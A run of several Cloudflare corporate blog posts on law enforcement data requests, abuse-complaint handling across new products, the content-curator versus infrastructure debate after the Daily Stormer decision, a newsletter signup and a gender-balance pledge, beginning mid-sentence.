U.S. company that stores customer records inside the United States, Cloudflare has long held the view that non-U.S. governments should have to follow U.S. due process requirements in order to obtain any records about our customers. When non-U.S. governments have come to us requesting records, we have explained the nature of our service and, to the extent they were interested in obtaining data, encouraged them to submit a request to the U.S. Department of Justice through the MLAT process.But it’s important to note that these processes serve an important function and are not just intended to delay the efforts of foreign law enforcement. They have helped us address some of the more challenging requests that we have seen. Let’s say, for example, law enforcement from an otherwise-respected nation sent us a court order demanding information about websites run by a vocal group of dissenters or even the organizers of a separatist referendum and also asked us to redirect that website to a location of their choosing. In that case, we would direct that foreign agency to submit an MLAT request. In situations like this, we might not receive subsequent legal process from the U.S. government, either because the government declined to ask the Department of Justice for an MLAT related to activity that could be viewed as political or because the Department of Justice declined to process it. With the changing legal and policy landscape, as well as our increased presence in non-U.S. locations, we think it’s time to take a step towards the new framework that is taking shape. What type of information could we provide to non-US law enforcement? The overwhelming majority of information that U.S. law enforcement seeks from Cloudflare through legal process is what we consider to be basic subscriber data -- the type of information that customers give us when they sign up for service. That includes things like name, email address, physical address, phone number, the means and source of payment, and non-content information about a customer’s account, such as data about login times and IP addresses used to login to the account.Although we consider this account information to be private customer data, worthy of protection, we share the commonly held view that it is less sensitive than information considered to be content, such as email communications or documents created by users. In fact, U.S. law allows law enforcement to compel us to provide basic subscriber data with a subpoena, a type of legal process that does not require prior judicial review. Recent policy discussions have convinced us that there may be situations where it is appropriate to provide this type of basic subscriber information to non-U.S law enforcement in response to non-U.S. legal process similar to a subpoena, a view in line with that of many other tech companies. We may therefore respond to requests for subscriber information if a government is seeking information about a crime in its country or about its citizens, we have employees in the country, and appropriate due process requirements and international standards have been met. We will also consider whether the country has signed a CLOUD Act agreement with the United States. The CLOUD Act and other existing U.S. laws govern the provision of more sensitive, content data to non-U.S. law enforcement. U.S. companies are legally prohibited from providing content data to a non-U.S. government absent a U.S. CLOUD Act agreement with that country. Given the nature of our service, however, we rarely have records that constitute content that we could provide to law enforcement regardless of jurisdiction. Overall Principles We FollowWhen we talk about our relationship with law enforcement, we often say that it is not Cloudflare's intent to make law enforcement's work any harder or any easier. We respect both that law enforcement agencies have a job to do and that our customers have rights relating to how their data is shared with law enforcement.Regardless of what government is asking, there are certain standards we believe must be followed before we turn over customer data. Our goal is to maintain a healthy and open relationship with law enforcement officials so that they understand and respect our positions on each of these standards. The principles which remain important to us are as follows:Require Due Process. Cloudflare requires government entities seeking access to personal customer information to obtain appropriate legal process, including prior independent judicial review of any request for content.Provide Notice. We believe our customers deserve to be notified when we receive legal requests for their information, whether the requests come from law enforcement or private parties involved in civil litigation. We will provide that notice before we disclose the information, unless prohibited by law. Protect Privacy and User Rights. Whether inside or outside the United States, Cloudflare will fight law enforcement requests that we believe are overbroad, illegal, or wrongly issued. This includes requests to delay or prevent notice that appear unnecessarily broad, given the government interests at stake.Be Transparent. We believe the ability to report on the numbers and types of requests that we get from law enforcement, as well as how we respond, is critical to building trust with our customers. We will fight requests that unnecessarily restrict our ability to be transparent with our users.Consistent with the last standard, we also intend to update our transparency report to reflect any requests that we receive from non-U.S. law enforcement authorities, whether for user information or anything else.

Out of the Clouds and into the weeds: Cloudflare’s approach to abuse in new products

In a blogpost yesterday, we addressed the principles we rely upon when faced with numerous and various requests to address the content of websites that use our services. We believe the building blocks that we provide for other people to share and access content online should be provided in a content-neutral way. We also believe that our users should understand the policies we have in place to address complaints and law enforcement requests, the type of requests we receive, and the way we respond to those requests. In this post, we do the dirty work of addressing how those principles are put into action, specifically with regard to Cloudflare’s expanding set of features and products. Abuse reports and new productsCurrently, we receive abuse reports and law enforcement requests on fewer than one percent of the more than thirteen million domains that use Cloudflare’s network. Although the reports we receive run the gamut -- from phishing, malware or other technical abuses of our network to complaints about content -- the overwhelming majority are allegations of copyright violations copyright or violations of other intellectual property rights. Most of the complaints that we receive do not identify concerns with particular Cloudflare services or products.In the last year or so, we’ve also launched a variety of new products, including our video product (Cloudflare Stream), a serverless edge computing platform (Cloudflare Workers), a self-serve registrar service, and a privacy-focused recursive resolver (, among others. Each of these services raises its own complex set of questions.  There is no one-size-fits-all solution to address possible abuse of our products. Different types of services come with different expectations, as well as different legal and contractual obligations. Yet as we discussed in relation to our focus on transparency on Monday, being fully transparent means being consistent and predictable so our users can anticipate how we will respond to new situations. Developing an approach to abuseTo help us sort through how to address both complaints and law enforcement requests, when we introduce new products or features, we ask ourselves four basic sets of questions about the relationship between the service we’re providing and potential complaints about content: First, how are Cloudflare’s services interacting with the website content? For example, are we doing anything more than providing security and acting as a reliable conduit from one location to another?  Are we providing definitive storage of content? Did we provide the website its domain name through our registrar service? Is the Cloudflare service or product doing anything that could be seen as organizing, analyzing, or promoting content? Second, what type of action might a law enforcement or private complainant want us to take and what are the consequences of it?  What sort of information might law enforcement request -- private information about the user, content of what was sent over the Internet, or logs that would track activity?  Will third parties request information about a website; would they request removal of content from the Internet? Would removing our services address the problem presented? Third, what laws, regulations or contractual requirements apply? Does the nature of our interaction with the online content impact our legal obligations? Has the law enforcement request or regulation satisfied basic principles of the rule of law or due process? Fourth, will our response to the matter presented scale to address the variety of different requests or complaints we may receive over time, covering a variety of different subject matters and viewpoints? Can we craft a principled and content-neutral process to respond to the request? Would our response have an overbroad impact, either by impacting more than the problematic content or changing the Internet in jurisdictions beyond the one that has issued the law or regulation at issue? Although those preliminary questions help us determine what actions we must take, we also do our best to think about the broader implications on the Internet of any steps we might take to address complaints. So how does this work in practice? Response to abuse complaints for customers using our proxy and CDN servicesPeople often come to Cloudflare with abuse complaints because our network sits in front of our customers’ sites in order to protect them from cyber attacks and to improve the performance of their website. There aren’t a lot of laws or regulations that impose obligations to address content on those providing security or CDN services, for good reason. Most people complaining about content are looking for someone who can take that content off the Internet entirely. As we’ve talked about on other occasions, Cloudflare is unable to remove content that we don’t host, so we therefore try to make sure that the complaint gets to its intended audience -- the hosting provider who has the ability to remove the material from the Internet. As described on our abuse page,  complaining parties automatically receive information about how to contact the hosting provider, and unless the complaining party requests otherwise, abuse complaints are automatically forwarded to both the website owner and the hosting company to allow them to take action. This approach has another benefit, consistent with the fourth set of questions we ask ourselves. It prevents addressing content with an unnecessarily blunt tool. Cloudflare is unable to remove its security and CDN services from only a sliver of problematic content on a website.  If we remove our services, it has to be from an entire domain or subdomain, which may cause considerable collateral damage. For example, think of the vast array of sites that allow individual independent users to upload content (“user generated content”). A website owner or host may be able to curate or deal with specific content, but if companies like Cloudflare had to respond to allegations of abuse by a single user’s upload of a single piece of concerning content by removing our core services from an entire site, and making it vulnerable to a cyberattack, those sites would be much more difficult to operate and the content contributed by all other users would be put at risk. Similarly, there are a number of different infrastructure services that cooperate to make sure each connection on the Internet can happen successfully – DNS, registrars, registries, security, etc.  If each of the providers of those services, any one of which could put the entire transmission at risk, is applying blunt tools to address content, then the aperture of what content will stay online will get smaller and smaller. Those are bad results for the Internet. Actions to address troubling content online should focus narrowly on the actual concern to avoid unintended collateral consequences. While we are unable to remove content we do not host, we are able to take steps to address abuse of our services, such as phishing and malware attacks. Phishing attacks typically fall into two buckets -- a website that has been compromised (unintentional phishing) or a website solely dedicated to intentionally misleading others to gather information (intentional phishing). These buckets are treated differently. We discussed earlier that we aim to use the most precise tools possible when addressing abuse, and we take a similar approach for unintentional phishing content. If a website has been compromised (typically an outdated CMS) we can place a warning interstitial page in front of that specific phishing content to protect users from accidentally falling victim to the attack. In the majority of situations, this action is taken at a URL level of granularity. In the case of intentional phishing attacks, such a domain like  my-totally-secure-login-page{.}com in combination with our Trust & Safety team being able to confirm the presence of phishing content on the website, we take broader action including a domain-wide interstitial warning page (effectively *my-totally-secure-login-page{.}com/*), and in some cases we may terminate our services to the intentionally malicious domain. To be clear though, this does not remove the phishing content that remains hosted by the website’s hosting provider. Ultimately, action still needs to be taken by the website owner or hosting provider to fully remove the underlying issue.Response to complaints about content stored definitively on our networkWe think our approach requires a different set of responses for the small, but growing, number of Cloudflare products that include some sort of storage. Cloudflare Stream, for example, allows users to store, transcode, distribute and playback their videos. And Cloudflare Workers may allow users to store certain content at the edge of our network without a core host server. Although we are not a website hosting provider, these products mean we may be be the only place where a certain piece of content is stored in some cases.  When we are the definitive repository for content through any of our services, Cloudflare will carefully review any complaints about that content and may disable access to it in response to a valid legal takedown request from either government or private actors. Most often, these legal takedown requests are from individuals alleging copyright infringement.  Under the U.S. Digital Millennium Copyright Act, there is a specific process online storage providers follow to remove or disable access to content alleged to infringe copyright and provide an opportunity for those who post the material to contest that it is infringing. We have already begun implementing this process for content stored on our network.  That’s why we’ve begun a new section of our transparency report on requests for content takedown pursuant to U.S. copyright law for content that is stored on our network.  We haven’t received any government requests yet to take down content stored on our network. Given the significant potential impact on freedom of expression from a government ordering that content be removed, if we do receive those requests in the future, we will carefully analyze the factual basis and legal authority for the request.  If we determine that the order is valid and requires Cloudflare action, we will do our best to address the request as narrowly as possible, for example, by clarifying overbroad requests or limiting blocking of access to the content to those areas where it violates local law, a practice known as “geo-blocking”. We will also update our transparency report on any government requests that we receive in the future and any actions we take.Response to complaints about our registrar serviceIf you sign up for our self-serve registrar service, you’re legally bound by the terms of our contract with the Internet Corporation for Assigned Names and Numbers (ICANN), a non-profit organization responsible for coordinating unique Internet identifiers across the world, as well as our contract with the relevant domain name registry.  Our registrar-focused web page for abuse reporting does not reference abuse complaints about a website’s content.  In our role as a domain registrar, Cloudflare has no control or ability to remove particular content from a domain. We would be limited to simply revoking or suspending the domain registration altogether which would remove the website owner’s control over the domain name. Such actions would typically only be done at the direction of the relevant domain name registry, in accordance with their registration rules associated with the Top Level Domain, or more usually to address incidents of abuse as raised by the registry or ICANN. We therefore treat content-related complaints submitted based on our registrar services the same way we treat complaints about content for sites using our CDN or proxy services.  We forward them to the website owner and the website hosting company to allow them to take action or we work in tandem with the relevant registry and at their direction. Running a registrar service comes with other legal obligations. As an ICANN accredited registrar, part of our contractual obligations include adhering to third party dispute resolution processes regarding trademark disputes, as handled by providers such as the World Intellectual Property Organization (WIPO) and the National Arbitration  Forum. Also, we continue to be part of the ICANN community discussions on how best to handle the collection, publication and provision of access to personal data in the WHOIS database in a manner consistent with the EU’s General Data Protection Regulation (GDPR) and other privacy frameworks. We will provide more updates on that front when the discussions have ripened. Response to complaints about IPFSBack in September, we announced that Cloudflare would be providing a gateway to the InterPlanetary File System (IPFS). Cloudflare’s IPFS gateway is a way to access content stored on the IPFS peer-to-peer network. Because Cloudflare is not acting as the definitive storage for the IPFS network, we do not have the ability to remove content from that network. We simply operate as a cache in front of IPFS, much as we do for our more traditional customers. Because content is stored on potentially dozens of nodes in IPFS, if one node that was caching content goes down, the network will just look for the same content on another node. That fact makes IPFS exceptionally resilient. That same resilience, however, means that unlike with our traditional customers, with IPFS, there is no single host to inform of a complaint about content stored on the IPFS network.  Cloudflare often has no knowledge of who the owner is of content being accessed through the gateway, and this makes it impossible to notify the specific owner when we receive a complaint.The law hasn’t yet quite caught up with distributed networks like IPFS, and there’s a notable debate among IPFS users about how best to deal with abuse. Some argue that having problematic content stored on IPFS will discourage adoption of the protocol, and advocate for the development of lists of problematic hashes that  IPFS gateways could choose to block. Others point out that any mechanism intended to block IPFS content will itself be subject to abuse. We don’t have the answer to that debate, but it does demonstrate to us the importance of being thoughtful about how we proceed.For the time being, our plan is to respond to U.S. court orders that require us to clear our cache of content stored on IPFS. More importantly, however, we intend to report in future transparency reports on any law enforcement requests we receive to clear our IPFS cache, to ensure continued public discussion.Cloudflare Resolvers: and Resolver for FirefoxIn April of last year, we launched our first DNS resolver,  In June, we partnered with Mozilla to provide direct DNS resolution from within the Firefox browser using the Cloudflare Resolver for Firefox. Our goal with both resolvers was to develop fast DNS services that were focused on user privacy.  We often get questions about how how we deal with both abuse complaints and law enforcement requests related to our resolvers.  Both of our resolvers are intended to provide only direct DNS resolution. In other words, Cloudflare does not block or filter content through either or the Cloudflare Resolver for Firefox. If Cloudflare were to receive a request from a law enforcement or government agency to block access to domains or content through one of our resolvers, Cloudflare would fight that request. At this point, we have not yet received any government requests to block content through our resolvers. Cloudflare would also document any request to block content from our resolvers in our semi-annual transparency report, unless we were legally prohibited from doing so. Similarly, Cloudflare has not received any government requests for data about the users of our resolvers, and would fight such a request if necessary. Given our public commitment not to retain any personally identifiable information for more than 24 hours, we believe it is unlikely that we would have any information even if asked. Nonetheless, if we were to receive a government request for data about a resolver user, we would document the request in our transparency report, unless legally prohibited from doing so.    The long road aheadAlthough new products offered by Cloudflare in the future, as well as the legal and regulatory landscape, may change over the years, we expect that our approach to thinking about new products will stand the test of time. We’re guided by some central principles -- allowing our infrastructure to be as neutral as possible, following the rule of law or requiring due process, being open about what we’re doing, and making sure that we’re consistent regardless of the wide variety of issues we face. And we will work hard to make sure that doesn’t change, because even the smallest tweaks to the way we do things can have a significant impact at the scale we operate.

The Serverlist Newsletter 2nd Edition: Available Now

Check out our second edition of The Serverlist below. Get the latest scoop on the serverless space, get your hands dirty with new developer tutorials, engage in conversations with other serverless developers, and find upcoming meetups and conferences to attend.Sign up below to have The Serverlist sent directly to your mailbox. .newsletter .visually-hidden { position: absolute; white-space: nowrap; width: 1px; height: 1px; overflow: hidden; border: 0; padding: 0; clip: rect(0 0 0 0); clip-path: inset(50%); } .newsletter form { display: flex; flex-direction: row; margin-bottom: 1em; } .newsletter input[type="email"], .newsletter button[type="submit"] { font: inherit; line-height: 1.5; padding-top: .5em; padding-bottom: .5em; border-radius: 3px; } .newsletter input[type="email"] { padding-left: .8em; padding-right: .8em; margin: 0; margin-right: .5em; box-shadow: none; border: 1px solid #ccc; } .newsletter input[type="email"]:focus { border: 1px solid #3279b3; } .newsletter button[type="submit"] { padding-left: 1.25em; padding-right: 1.25em; background-color: #f18030; color: #fff; } .newsletter .privacy-link { font-size: .9em; } Email Submit Your privacy is important to us newsletterForm.addEventListener('submit', async function(e) { e.preventDefault() fetch('', { method: 'POST', body: newsletterForm.elements[0].value }).then(async res => { const thing = await res.text() newsletterForm.innerHTML = thing const homeURL = '' if (window.location.href !== homeURL) { window.setTimeout(_ => { window.location = homeURL }, 5000) } }) }) iframe[seamless]{ background-color: transparent; border: 0 none transparent; padding: 0; overflow: hidden; } const magic = document.getElementById('magic') function resizeIframe() { const iframeDoc = magic.contentDocument const iframeWindow = magic.contentWindow magic.height = iframeDoc.body.clientHeight const injectedStyle = iframeDoc.createElement('style') injectedStyle.innerHTML = ` body { background: white !important; } ` magic.contentDocument.head.appendChild(injectedStyle) function onFinish() { setTimeout(() => { = '' }, 80) } if (iframeDoc.readyState === 'loading') { iframeWindow.addEventListener('load', onFinish) } else { onFinish() } } async function fetchURL(url) { magic.addEventListener('load', resizeIframe) const call = await fetch(`${url}`) const text = await call.text() magic.srcdoc = text } fetchURL("")

Unpacking the Stack and Addressing Complaints about Content

Although we are focused on protecting and optimizing the operation of the Internet, Cloudflare is sometimes the target of complaints or criticism about the content of a very small percentage of the more than thirteen million websites that use our service. Our termination of services to the Daily Stormer website a year and a half ago drew significant attention to our approach to these issues and prompted a lot of thinking on our part.  At the time, Matthew wrote that calls for service providers to reject some online content should start with a consideration of how the Internet works and how the services at issue up and down the stack interact with that content. He tasked Cloudflare’s policy team with engaging broadly to try and find an answer. With some time having passed, we want to take stock of what we’ve learned and where we stand in addressing problematic content online.  The aftermath of the Daily Stormer decisionThe weeks immediately following the decision in August 2017 were filled with conversations. Matthew made sure the Cloudflare team accepted every single invitation to talk about these issues; we didn’t simply put out a press release or “no comment” anyone. Our senior leadership team spoke with the media and with our employees -- some of whom had received threats related both to Cloudflare’s provision of services to the Daily Stormer and to the termination of those services. On the policy side, we spoke with a broad range of ideologically-diverse advocacy groups who reached out to alternatively congratulate us or chastise us for the decision. As the time stretched into months, the conversations changed. We spoke with organizations who have made it their mission to fight hate and intolerance, with human rights organizations that depend on access to the Internet, with tech companies doing their best to moderate content, with academics who think about and research all aspects of content online, and with interested government and non-governmental organizations on two continents. In the end, we spoke with hundreds of different experts, groups, and entities about how different companies and different types of services address troubling content at different places in the Internet stack.  Our overwhelming sense from these conversations is that the Internet, and the industry that has grown up around it, is at a crossroads. Policy makers and the public are rightly upset about misuse of the Internet.  We heard repeatedly that the world is moving away from the Internet as a neutral platform for people to express themselves and access information. Many governments and many of the constituents they represent appear to want the Internet cleaned up and stripped of troubling content through any technical means necessary, even if it means that innovation will be stifled and legitimate voices will be silenced. And companies large and small seem to be going along with it.Moving forwardWe’ve thought long and hard about what’s next both for us and the Internet in general. Although we share concerns about the exploitation of online tools, we are convinced that there are ways forward that do not shortchange the security, availability, and promise of the Internet. We think the right solution will take us out of the clouds and into the weeds.  We have to figure out what core functions need to be protected to have the Internet we want, and we will have to get away from the idea that there’s a one-size-fits-all solution that will address the problems we see. If we really want to address risks online while maintaining the Internet as a forum for communication, commerce, and free expression, different kinds of services are going to have to deal with abuse differently. The more we talked to people, the more that we saw a fundamental split on the Internet between the services that substantively touch content and the infrastructure services that do not.  It’s possible that, as a company that provides largely infrastructure services ourselves, we were were looking for this distinction. But we believe the distinction is real and helps explain why different businesses make distinctly different choices. As we discuss in our blog posts on transparency this week, the approach to questions about abuse complaints will mean different things for different Cloudflare products. Although we are not at the point yet where Cloudflare’s products organize, analyze, or promote content, we are aware that this conclusion may have implications for us in the future. Content curators The Internet has revolutionized the way we communicate and access information. Because of the way the Internet works, everyone online has the opportunity to create and consume the equivalent of their own newspaper or television network. Almost any content you could want is available, if you can find it. That idea is at the heart of a the divide between services that curate content -- like social media platforms and search engines -- and basic Internet infrastructure services.  Content curators make content-based decisions for a business purpose. For a search engine, that might mean algorithmically reviewing content to best match what is sought by the user. For a social media site, it might be a review of content to help predict what content the user will want to see next or what advertising might be most appealing. For these types of online products, users understand and generally expect that the services will vary based on content. Different search engines yield different results; Different social media platforms will promote different content for you to review. These services are the Internet’s equivalents of the very small circle of newspaper editors or television network executives of old, making decisions about what you see online based on what they think you’ll want to see. The value in these content curator services depends on how well they analyze, use, and make judgments about content.  From a business perspective, that means that these services want the flexibility to include or exclude particular content from their platforms. For example, it makes perfect sense for a platform that advertises itself as building community to have rules that prevent the community from being disrupted with hate-filled messages and disturbing content. We should expect content curator services to moderate content and should give them the flexibility to do so. If these services are transparent about what they allow and don’t allow, and how they make decisions about what to exclude, they can be held accountable the same way people hold other businesses to account. If people don’t like the judgments being made, they can take their business to a platform or service that’s a better fit. Basic Internet infrastructure servicesBasic Internet services, on the other hand, facilitate the business of other providers and website owners by providing infrastructure that enables access to the Internet.  These types of services -- which Matthew described in detail in the Daily Stormer blog post -- include telecommunications services, hosting services, domain name services such as registry and registrar services, and services to help optimize and secure Internet transmissions. The core expertise of these services is not content analysis, but providing the infrastructure needed for someone else to develop and analyze that content. Because people expect these infrastructure services to be used to provide technical access to the Internet, the notion that these numerous services might be used to monitor what you’re doing online or make decisions about what content you should be entitled to access feels like a misuse, or even an invasion of privacy. Internet infrastructure is a lot like other kinds of physical infrastructure.  At some basic level, we believe that everyone should be allowed to have housing, electricity or telephone, no matter what they plan to do with those services. Or that individuals should be able to send packages through FedEx or walk down the street wearing a backpack with a reasonable expectation they won’t be subject to unfounded search or monitoring. Much as we believe that the companies that provide these services should provide services to all, not just those with whom they agree, we continue to believe that basic internet infrastructure services, which provide the building blocks for other people to create and access content online, should be provided in a content-neutral way. Complicated companiesDeveloping different expectations for content curation services and infrastructure services is tougher than it seems. Behemoths best known for content curation services often provide infrastructure services as well. Alphabet, for example, provides content-neutral infrastructure services to millions of customers through Google Cloud and Google Domains, while also running one of the world’s largest content curated site in YouTube. And even if companies try to distinguish their infrastructure from content curation services, their customers may not. In a world where content needs to be on a large network to stay online, there are only a handful of companies that can satisfy. Reducing that handful to those — like Cloudflare — that fall solely into the infrastructure bucket makes the number almost impossibly small. That is why we want to do better job talking about differences in expectations not by company, but by service. And maybe we should also recognize that having only a small number of companies with robust enough networks to keep content online--most of which do content curation--is part of the problem. If you believe that the only way to be online is to be on a platform that curates content, you’re going to be rightly skeptical of that company’s right to take down content that they don’t want on their site. That doesn’t mean that a business that depends on analyzing content has to stop doing it, but it does make it that much more important that we have neutral infrastructure. It might be impossible for an alternate platform to be built, and for certain voices to have a presence online, without it.The good news is that we’re not alone in our view of the fundamental difference between content curators and Internet infrastructure services. From the criticism we received for the Daily Stormer decision, to the commentary of Mike Masnick at Techdirt, to the academic analysis of Yale Law Professor Jack Balkin, to the call of the Global Commission on the Security of Cyberspace (GCSC) to protect the “public core” of the Internet, there’s an increasing awareness that not protecting neutral Internet infrastructure could undermine the Internet as we know it. Thoughts on due processIn his blog post on the Daily Stormer decision, Matthew talked about the importance of due process, the idea that you should be able to know the rules a system will follow if you participate in that system. But what we’ve learned in our follow up conversations is that due process has a different meaning for content curators.There has been a clamor for companies like Facebook and Google to explain how they make decisions about what to show their users, what they take down, and how someone can challenge those decisions. Facebook has even developed an “Oversight Board for Content Decisions” -- dubbed as Facebook’s supreme court -- that is empowered to oversee the decisions the company makes based on its terms of service. Given that this process is based on terms of service, which the company can change at will to accommodate business decisions, this mostly seems like a way to build confidence in the company’s decision-making process. Instituting an internal review process may make users feel that the decisions are less arbitrary, which may help the company keep people in their community.That idea of entirely privatized due process may make sense for content curators, who make content decisions by necessity, but we don’t believe it makes sense for those that provide infrastructure services. When access to basic Internet services is on the line, due process has to mean rules set and adjudicated by external decision-makers. Abuse on Internet infrastructureAlthough we don’t believe it is appropriate for Cloudflare to decide what voices get to stay online by terminating basic Internet services because we think content is a problem, that’s far from the end of the story. Even for Internet infrastructure, there are other ways that problematic content online can be, and is, addressed. Laws around the world provide mechanisms for addressing particular types of content online that governments decide is problematic. We can save for another day whether any particular law provides adequate due process and balances rights appropriately, but at a minimum, those who make these laws typically have a political legitimacy that infrastructure companies do not. Tomorrow, we’ll talk about how we are operationalizing our view that it’s important to  get into the weeds by considering how different laws apply to us on a service-by-service, and function-by-function basis.

Cloudflare Signs European Commission Declaration on Gender Balanced Company Culture

Last week Cloudflare attended a roundtable meeting in Brussels convened by the European Commissioner for Digital Economy and Society, Mariya Gabriel, with all signatories of the Tech Leaders’ Declaration on Gender Balanced Company Culture. Cloudflare joined this European Commission initiative late last year and, along with other companies, we are committed to taking a hands-on approach to close the digital gender divide in skills, inception of technologies, access and career opportunities.In particular, we have all committed to implementing, promoting and spreading five specific actions to achieve equality of opportunities for women in our companies and in the digital sector at large:Instil an inclusive, open, female-friendly company cultureRecruit and invest in diversityGive women in tech their voice and visibilityCreate the leaders of the futureBecome an advocate for changeThe project, spearheaded by the Digital Commissioner as part of a range of actions to promote gender balance in the digital industry, allows for the exchange of ideas and best practices among companies, with opportunities to chart progress and also to discuss the challenges we face. Many companies around the table shared their inspiring stories of steps taken at company level to encourage diversity, push back against societal restraints and address unconscious biases at work. Flexible work practices and policies, the importance of network building and mentoring, employee training, clear career progression paths for women and pay equality can all play a part in creating a more diverse workplace. Confidence building, including for public speaking, was also an important factor raised by many participants. Despite ongoing efforts, such as the No Women No Panel Campaign launched in Brussels last year, a recent report issued by EU Panel Watch noted that women’s voices are still not distributed evenly across conference topics with a very clear feminisation, masculinisation and radicalisation of sectors. Sectors showing the lowest levels of speaker participation of women, particularly for keynotes, included telecommunications and technology. Although progress is taking place, it is happening much too slowly.European Commission, DG Connect: Commissioner Gabriel and company signatories Cloudflare initiatives Despite being one of the youngest companies at the table, Cloudflare has put significant effort into diversity and inclusion programmes, including gender, as we have an unwavering commitment to the idea that everybody should be treated fairly and feel comfortable and respected at work. We also strongly believe in the importance of  having diverse teams design, build and test our products in order to ensure their success. We have found that diversity, in all its forms, fosters better innovation and creativity in our company through a greater variety of problem-solving approaches and perspectives, while increasing employee satisfaction and collaboration. McKinsey has also explored the link between financial performance of a company and gender diversity, which underscores the importance of non-homogenous teams in the workplace. Cloudflare’s commitment comes from the very top line of management - with no finer example than our co-founder Michelle Zatlyn - but we also adopt a bottom-up approach, with our Cloudflare Aware (Diversity & Inclusion) Programme which offers everyone a chance to contribute to different initiatives through employee-driven working groups. We also partner with external organisations, such as Toastmasters, which facilitates sessions for all employees to practice their public speaking and communication skills in a ‘safe’ environment. This enables our female employees in particular to build a pathway towards high profile speaking engagements externally - should they wish to do so - and so play their part in bringing increased diversity to public debates. In fact, we take every opportunity we can to underline the importance of closing the gender gap, even if it means doing something as simple as allowing early access to our Registrar service with donations made to Girls Who Code.The majority of Cloudflare’s jobs exist in Software Engineering and it can be challenging to recruit female talent in this area. We are particularly keen to speak to women from an engineering background, so please do check out our careers page and spread the word! As a sector, we need to do more collectively to close the gender gap, and with this in  mind, we have also recently added our name to the UK Tech Talent Charter. This UK Government-supported initiative is an industry collective which recognizes that only through working together and joining forces can any real meaningful change happen.As International Womens’ Day approaches, and with this year’s campaign theme being #BalanceforBetter, we will be announcing more activities in this space and seizing the opportunity to celebrate women's achievements with groups worldwide.


Recommended Content